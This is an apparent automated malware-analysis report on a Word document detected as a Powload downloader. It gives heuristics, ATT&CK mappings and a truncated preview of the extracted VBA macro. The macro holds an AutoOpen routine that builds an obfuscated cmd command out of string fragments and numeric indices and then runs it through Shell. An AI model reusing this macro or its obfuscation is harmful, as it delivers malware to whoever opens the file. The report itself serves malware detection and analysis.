Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Malware.Powload-6803987-0'. It contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to construct and execute a command using obfuscated string concatenations, indicative of a downloader or initial execution stage for a more complex payload.
Heuristics (5)

- ClamAV: Doc.Malware.Powload-6803987-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6803987-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11897 bytes |

SHA-256: c640daf1e506c6425441b734511d612476c53aa855b5c456d52447d4abc9c52d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "SNMMFrcLz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName jcmNU
TypeName CByte(792)
TypeName 98
TypeName 54
TypeName Int(AwFmf + 44329)
TypeName 956
Shell@ KeyString(vbKeyC) + hpbOtaDTutG + IQJwXTRPhGXIjz + jClDjAwt + IDnZjzbZlRA + wWNPQ + PMZEPolIY + XMldwk + awqiMtXqCpr + cskwIK + ijtPopSrF + vLzBCvfdzKVS + QAiEFKcDHu, 893070038 - 893070038
TypeName Sin(9)
TypeName 9706
TypeName CInt(RlYiis)
End Sub
Attribute VB_Name = "hFUNDTC"
Function jClDjAwt()
On Error Resume Next
TypeName Sgn(34568109)
TypeName Oct(WvzhE)
TypeName CSng(GADMq / PTnKVF)
hcjKD = "md" + " " + "/V:" + "O/" + "C" + CStr(Chr(YTIvHEAO + irNXzvEmPKFis + 34 + cVaEijjdwSpv + XcQPNKEBUa)) + "s" + "e" + "t" + " - " + " " + "=I"
TypeName Int(88630 - PNFWc)
TypeName jYDfi
qBKhHPh = "dBS" + "Z" + "aVl" + "EV" + "EJw" + "pR" + "Gp" + "McX" + "USa" + "hl" + "Er"
TypeName 923
TypeName Sqr(8)
TypeName pmjcBZ
fZpof = "h" + "l" + "Bw" + "sz " + "7+" + "Wi" + ";mN" + "9" + "qC"
TypeName TAwmG
TypeName 47
TypeName Fix(wnwkP)
MwTPcZQ = ".@," + "\Pk" + "}t" + "Qb'" + "j26" + "=" + "oT)" + "fDy" + ":"
TypeName Cos(zCHfDT + sPvuR)
TypeName CDbl(8)
TypeName hkqWXA
wNpjUc = "/" + "nue" + "{F" + "4" + "Hv1" + "$(-"
TypeName 385
TypeName qXbdN
TypeName CByte(WooEZ)
EvQTXVCAbNs = "x" + "&" + "&f" + "o" + "r " + "%o" + " i" + "n " + "(" + "1" + "6,"
jClDjAwt = hcjKD + qBKhHPh + fZpof + MwTPcZQ + wNpjUc + EvQTXVCAbNs
TypeName Sgn(22)
TypeName Cos(11105 / Kiuuz + 34505 + YQDlwM)
TypeName 85
End Function
Function IDnZjzbZlRA()
On Error Resume Next
TypeName 94
TypeName Hex(59353 / oqwpb + ODXqTX - cOmVb)
TypeName Round(604)
PzFMCz = "59," + "30" + ",69" + "," + "26" + "," + "31," + "2" + "7,6"
TypeName Sqr(44066 - AjAFb)
TypeName Atn(sTPiO)
TypeName CStr(46398 / qWVWR)
vfvtaYo = "9" + ",28" + ",28" + ",33" + ",7" + "6," + "53," + "37" + ",5" + "9,"
TypeName 2121
TypeName Int(bUzTjh)
oKCGnc = "5" + "8" + "," + "67," + "69" + "," + "30," + "78," + "59" + "," + "5" + "3," + "5"
TypeName jpMpWD
TypeName cIMII
TypeName Sin(OzzBmK)
nucuuL = "5,6" + "9," + "1" + "8," + "51," + "33,"
TypeName 392766598
TypeName BDwMkj
TypeName Atn(38471 + HSEZIR + 65698 - 47989)
AqwZASd = "40," + "69," + "51" + "," + "4" + "4,3" + "6" + ",6" + "9,5" + "3," + "4"
TypeName Int(ipJPvG)
TypeName CLng(jaoqfT)
TypeName CDbl(fpHWZV)
wMcGGLpzN = "3," + "28," + "3" + "7," + "69,"
TypeName 185071801
TypeName 3
sobPaTkAi = "6" + "7," + "51," + "3" + "8" + ",7" + "6," + "26" + ",67" + ",9" + ",58" + ",54"
TypeName 4638
TypeName CDate(YZNin / nzCJTj)
urNOJkc = ",27" + "," + "5" + "1" + "," + "51" + ",1" + "6,6" + "5," + "66," + "6"
TypeName Hex(aUbiDQ)
TypeName 9132
KuKoViEL = "6" + ",5" + "3,2" + "2,3" + "2," + "2" + "2,7" + "8" + "," + "31" + ",27"
TypeName 6
TypeName rGQto
TypeName Int(LbjZZ)
PzJwl = "," + "22" + ",2" + "6," + "51," + "2" + "2" + "," + "31"
TypeName CSng(9827 + 97243)
TypeName UHGQi
DzLpJLO = ",2" + "7" + ",4" + "4," + "26" + "," + "6" + "8," + "66" + ",2" + "7," + "49"
TypeName Fix(rIkUQn * UdMQcj)
TypeName 36033102
cQhMOijFlw = ",4" + "2," + "19," + "42," + "6" + "0," + "75," + "4" + "5" + ",2" + "7," + "5" + "1"
IDnZjzbZlRA = PzFMCz + vfvtaYo + oKCGnc + nucuuL + AqwZASd + wMcGGLpzN + sobPaTkAi + urNOJkc + KuKoViEL + PzJwl + DzLpJLO + cQhMOijFlw
TypeName ThjpCw
TypeName Atn(FlNvzi)
TypeName Chr(6531)
End Function
Function wWNPQ()
On Error Resume Next
TypeName Fix(EHmAFw)
TypeName Atn(566)
YsSVTiw = "," + "51," + "16" + ",6" + "5,6" + "6" + ",6" + "6," + "22" + ",67" + "," + "22,"
TypeName 291016583
TypeName Log(hikYU + UoEpK)
GkdUzsVD = "16" + ",2" + "2" + "," + "1" + "6,5"
TypeName Sqr(iEGiO)
... (truncated)